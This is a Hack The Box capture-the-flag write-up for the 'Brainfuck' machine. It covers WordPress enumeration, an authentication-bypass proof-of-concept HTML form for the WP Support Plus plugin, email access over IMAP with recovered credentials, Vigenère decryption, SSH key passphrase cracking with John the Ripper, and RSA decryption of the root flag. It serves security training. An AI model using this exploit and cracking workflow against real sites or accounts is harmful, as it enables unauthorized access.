HTB - Brainfuck

Linux | wpscan | telnet | cipher

Tools For This Room

  • WPScan - CLI based, WordPress security scanner - leverage WPScan's vulnerability database through its API - requires registration here

  • sshng2john.py - python script to convert into appropriate format for John the Ripper - download it here

  • Evolution Mail Client - install with "sudo apt-get install evolution"

TL;DR / Executive Summary

  1. Scan and enumerate with nmap, gobuster and wpscan

  2. Gain foothold with a privesc script for a WordPress plugin

  3. Privesc through an existing file on the system and

Scanning & Enumeration

Let's start off with an nmap scan.

nmap -sV -sC -vv <IP>

We get a few open ports: 22:SSH 25: SMTP 110: POP3 143: IMAP 443: HTTPS

Checking out port443 gives us this page. Do note that we have to use https instead of http.

An interesting point to note with the nmap results of port443 is the Subject Alternative Name.

"The Subject Alternative Name field lets you specify additional host names (sites, IP addresses, common names, etc.) to be protected by a single SSL Certificate..." - Digicert

We should check out the different domains listed. But first, we'll need to add them to the /etc/hosts file.

sudo nano /etc/hosts
10.10.10.17 www.brainfuck.htb sup3rs3cr3t.brainfuck.htb brainfuck.htb

Let's browse to https://sup3rs3cr3t.brainfuck.htb first. We can accept the warning page and go ahead.

We get a page called the Super Secret Forum, which very likely has important details for us.

Next, let's check out https://brainfuck.htb.

We're greeted by a WordPress page, which is good since its notorious for having vulnerabilities. We'll enumerate it with gobuster and wpscan.

  • gobuster

gobuster dir -u -k https://www.brainfuck.htb -w <wordlist>

Due to the expired certificate, we'll add a "-k" flag to ignore the certificate. The results give us a few useful directories, including a login page at /wp-admin.

  • wpscan

wpscan --url https://brainfuck.htb/ --disable-tls-checks --enumerate p --enumerate t --enumerate u

We get quite a few details, such as the version being 4.7.3, and two users.

Let's run the scan again, but this time using the API token to generate vulnerability data.

Registering on the WPScan website will give us an API token. This allows us to leverage the wpscan vulnerability database which covers WordPress, theme, and plugin vulnerabilities. The free version allows for 25 API requests/day, which translates to roughly one WordPress site.

wpscan --url https://brainfuck.htb --disable-tls-checks --api-token <APItoken>

Gaining Foothold

This results in 50 WordPress vulnerabilities, and 6 plugin vulnerabilities. Looking through the vulnerabilities, we can discount those which require authentication. We try a couple of plugin vulnerabilities but they don't work. However, we can look for more plugin vulnerabilities using searchsploit.

searchsploit wp support plus

We start with the SQLi exploit, but it doesn't seem to work. Let's try the Privilege Escalation one.

cat /usr/share/exploitdb/exploits/php/webapps/40939.txt

Let's copy the Proof of Concept into an .html file, and edit it for our victim site.

gedit bf.html
//paste the PoC in//
<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
	Username: <input type="text" name="username" value="administrator">
	<input type="hidden" name="email" value="sth">
	<input type="hidden" name="action" value="loginGuestFacebook">
	<input type="submit" value="Login">
</form>

Now we need to browse to the .html file to login to the WordPress site. In this case, we'll login as administrator. 

file:///<locationofhtmlfile>
// eg: file:///root/user1/bf.html //

Upon browsing to https://brainfuck.htb, we see that we are now administrator.

We don't find anything interesting in this profile, so let's switch over to user admin instead.

This time, we find something interesting. Click on Brainfuck Ltd. in the top right corner, then Themes in the drop down menu. Now select Settings from the list in the left column, then click Easy WP SMTP. Here we see the same email from before, and the SMTP password. Unfortunately, it's not in plaintext.

However, we can view it in plaintext with a neat trick. Right click to Inspect Element and look for the section which contains the SMTP Password. We'll find it in there clear as day.

Now we have a login combination of Orestis/kHGuERB29DNiNE for SMTP. As the name implies, SMTP (Simple Mail Transfer Protocol) is used for e-mail. We now need to use these credentials to access Orestis' emails and see if there's anything useful there. We can either use Telnet to do this, or the Evolution mail client if a GUI is preferred.

To gain a better understanding of what we're doing next and why, we'll go off on a slight tangent and explore SMTP, IMAP, and POP3 first.

All 3 protocols work at the Application layer. SMTP handles outbound email only, while POP3 (PostOfficeProtocol3) and IMAP (InternetMessageAccessProtocol) handle inbound email only. In POP3, the mail server and client are not kept in sync. Once the mail is downloaded from the server to the client, it's deleted from the server. In IMAP, the mail server and client are kept in sync. Manual deletion of mail is needed. For an animated overview of these protocols, check out this YouTube video.

We can use Telnet to access Orestis' email server through either POP3 or IMAP, but we'll take the IMAP route for this. One thing to note about IMAP commands is that each command requires a unique character(s) preceding it. This allows the server to associate a response with the corresponding command. This post by Moonpoint gives an excellent explanation.

First let's connect to the server:

telnet <IP> 143

Now we need to login. The "A" is the unique character for this command.

A login orestis kHGuERB29DNiNE

Once we're in, we go to the inbox.

B select inbox

Then we get the email.

D fetch 2 body[]

We find another username/password: orestis/kIEnnfEKJ#9UmdO, but this is for the secret forum which we found at the beginning.

Alternative 1: POP3

If we want to take the POP3 route instead, here are the commands we'd use:

telnet <IP> 110
retr2

Alternative 2: Evolution Mail Client

Download the Evolution mail client if it isn't on the attacking machine yet. Next, setup the client using orestis@brainfuck.htb. Then check the inbox for an email from root, and we'll have the password. For more details, check out Rana Khalil's writeup here.

Now that we have credentials to the super secret forum, let's try logging in there.

Nice, we're in. The "SSH Access" thread looks promising, and Orestis and the admin sound like good friends.

As Orestis said, the thread is encrypted.

If we look closely, Orestis has a habit of signing off with his catchphrase: "Orestis - Hacking for fun and profit". We also notice that this phrase is in the encrypted messages, but with different letter each time. This could be used with One-time Pad to get the cipher.

However, let's take a different route and try to identify what type of cipher is being used. We can do this with the Boxentriq online tool, which is the first result on Google.

Pasting in one of the encrypted messages, we get the result: Vigenere Cipher

Now that we've identified the cipher type, let's try to decipher the admin's message. Google suggests the dcode online tool for this.

We have our results in the left column. Visiting https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa downloads a file which requires a password. This is likely what the admin was referring to when he said he hopes Orestis remembers it, since he doesn't.

Since both the passwords from before don't work, we'll try to crack the password with John the Ripper. But first we'll need to convert the file type to JtR's format, using this tool.

python sshng2john.py <id_rsafile> > <convertedfile>

Now to crack it wide open.

john <convertedfile> --wordlist=rockyou.txt

We get the password 3poulakia!

Let's grant the id_rsa file the necessary permissions, and we can SSH in.

chmod 600 id_rsa
ssh -i id_rsa orestis@brainfuck.htb

Now we can grab that user flag:

Privilege Escalation

After trying the usual array of simple privesc commands, we find nothing. Upon closer examination of the files, we find 3 files which stand out: debug.txt, encrypt.sage, and output.txt.

Examining the script in encrypt.sage, we find that it's encrypting the root flag and printing it to output.txt. It's also printing the value of p, q, and e to debug.txt. A Google search result tells us that the script is related to RSA too. Let's just Google these terms to get a clearer picture.

From the post, we get a script to decrypt the contents of root.txt. We just need to modify it with our own p, q, e, and ct values.

Now we run the script, and get the output.

However, the output is in decimal. We need to convert it to hexadecimal, then to ASCII to get our flag.

And we are finally done.

PreviousHTB - ChatterboxNextHTB - Lame

Last updated

Was this helpful?